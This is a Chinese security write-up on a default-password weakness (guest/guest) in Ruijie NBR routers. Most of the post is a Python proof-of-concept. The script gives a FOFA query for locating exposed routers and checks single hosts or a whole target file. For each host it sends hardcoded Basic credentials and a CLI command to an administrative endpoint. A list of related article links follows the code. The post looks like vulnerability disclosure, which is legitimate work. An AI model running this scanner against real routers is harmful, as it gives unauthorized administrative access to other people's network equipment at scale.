锐捷NBR路由器存在弱口令漏洞

简介: 锐捷NBR路由器存在弱口令漏洞

漏洞简介

锐捷网络股份有限公司是一家数据通信解决方案提供商。
锐捷网络股份有限公司NBR路由器存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。

漏洞影响

NBR路由器

漏洞复现

百度上查询到NBR路由器的默认账号密码为guest/guest

91179e7b11ccd65c958c87ed98dd96e7.png

在NBR后台管理界面使用默认账号密码成功登录后台

feefba9d878be6dff46ec5d753fd6c47.png

poc

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告
import sys
import argparse
def lemonlove7():
    print('FOFA:title="锐捷网络--NBR路由器--登录界面"')
    print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
    print('python xxx.py -f/--file xxx.txt')
    print('lemonlove7')
if len(sys.argv) == 1:
    lemonlove7()
    sys.exit()
par = argparse.ArgumentParser(description='lemonlove7 help')
par.add_argument('-u','--url' ,help='输入url',default='')
par.add_argument('-f','--file',help='输入文件',default='')
a = par.parse_args()
url =a.url
file =a.file
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
    'Content-Type':'text/plain;charset=UTF-8',
    'Cookie':'c_name=; hardtype=NBR2000G; web-coding=gb2312; currentURL=; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest',
    'Authorization':'Basic Z3Vlc3Q6Z3Vlc3Q='
}
data = 'command=show clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.'
if url != '':
    url = url
    url2 =url
    try:
        url1 =url+'/WEB_VMS/LEVEL15/'
        r =requests.post(url=url1 , data=data,headers=headers,verify=False,timeout=10)
        #print(r.text)
        if r.status_code == 200 and 'WebCLI' in r.text:
            print(url2+'NBR路由器存在弱口令:guest/guest')
        else:
            print(url2+'NBR路由器不存在弱口令')
    except Exception as e:
        print(url2+'异常')
if file != '':
    p = open(file,'r+')
    for i in p.readlines():
        url = i.strip()
        if url.startswith('http://') != 1 and url.startswith('https://') != 1:
            url = 'http://'+url
        url=url
        url1=url
        #print(url)
        try:
            url = url +'/WEB_VMS/LEVEL15/'
            r=requests.post(url=url,headers=headers,data=data,verify=False,timeout=10)
            if r.status_code == 200 and 'WebCLI' in r.text:
                print(url1+'NBR路由器存在弱口令:guest/guest')
            else:
                print(url1+'NBR路由器不存在弱口令')
        except Exception as e:
            print(url1+'异常')

运行效果如下:

单个检测:

640.png

批量检测:

640.png

相关文章
|
安全 数据安全/隐私保护
渗透攻击实例-后台弱口令
渗透攻击实例-后台弱口令
|
3月前
|
网络协议 安全 API
家用路由器DNS被恶意篡改?教你如何应对
近期大量用户反馈家用路由器出现解析失效,怀疑部分家用路由器的DNS配置遭遇了非正常变动。我们建议家用路由器用户将本地DNS改成更安全可靠的服务器,如阿里云公共DNS;企业APP终端用户使用公共DNS企业版服务。
|
5月前
|
安全 物联网 网络安全
数字堡垒的裂缝与加固——网络安全漏洞与防护策略
【6月更文挑战第12天】在数字化浪潮中,网络安全和信息安全成为守护信息资产的重要防线。本文将深入探讨网络安全的脆弱性,加密技术的重要性,以及提升个人和企业安全意识的必要性。通过分析常见的网络攻击手段,我们将揭示如何识别和防御潜在的安全威胁,同时强调加密技术和安全教育在构建坚固的数字堡垒中的作用。
|
5月前
|
安全 PHP 数据安全/隐私保护
WAF攻防-菜刀&冰蝎&哥斯拉&流量通讯&特征绕过&检测反制&感知
WAF攻防-菜刀&冰蝎&哥斯拉&流量通讯&特征绕过&检测反制&感知
102 0
|
6月前
|
存储 SQL 安全
网络防线之盾:揭秘网络安全漏洞与加固策略
随着信息技术的飞速发展,网络安全面临的挑战日益严峻。本文深入探讨了网络安全领域的关键问题——安全漏洞及其利用、防御机制中的加密技术,以及提升个人和企业的安全意识。通过分析当前网络攻击的常见手段和漏洞类型,文章提出了一系列有效的防护措施和策略,旨在为读者提供实用的网络安全知识,并强调构建坚固信息安全防线的重要性。
|
安全 数据安全/隐私保护
攻击ATM机的木马出现 用户银行卡密码面临安全威胁
3.15刚过,就在广大网民还沉浸在中央电视台曝光的网银安全问题以及网络肉鸡攻击的恐怖氛围中时,3月18日,据国外消息,国外某安全研究机构称已发现针对银行 ATM(自动取款机) 的恶意软件,该恶意软件安装成功后可记录银行卡的相关信息,并可解密所截获数据和指令,并通过 ATM 的打印功能输出犯罪者想要的信息。
1159 0
|
安全
安全关注:惩处网络“黑客”有法可依
黑客源于英文hacker,原指热心于计算机技术、水平高超的电脑专家。然而时至今日,这个词常常被用来形容那些专门利用电脑搞破坏或者恶作剧的家伙(即骇客)。2006年10月16日,中国骇客whboy(李俊)发布“熊猫烧香”木马,在短短时间内致使中国数百万用户受到感染,并波及到周边国家。
919 0
|
网络安全 数据安全/隐私保护 网络虚拟化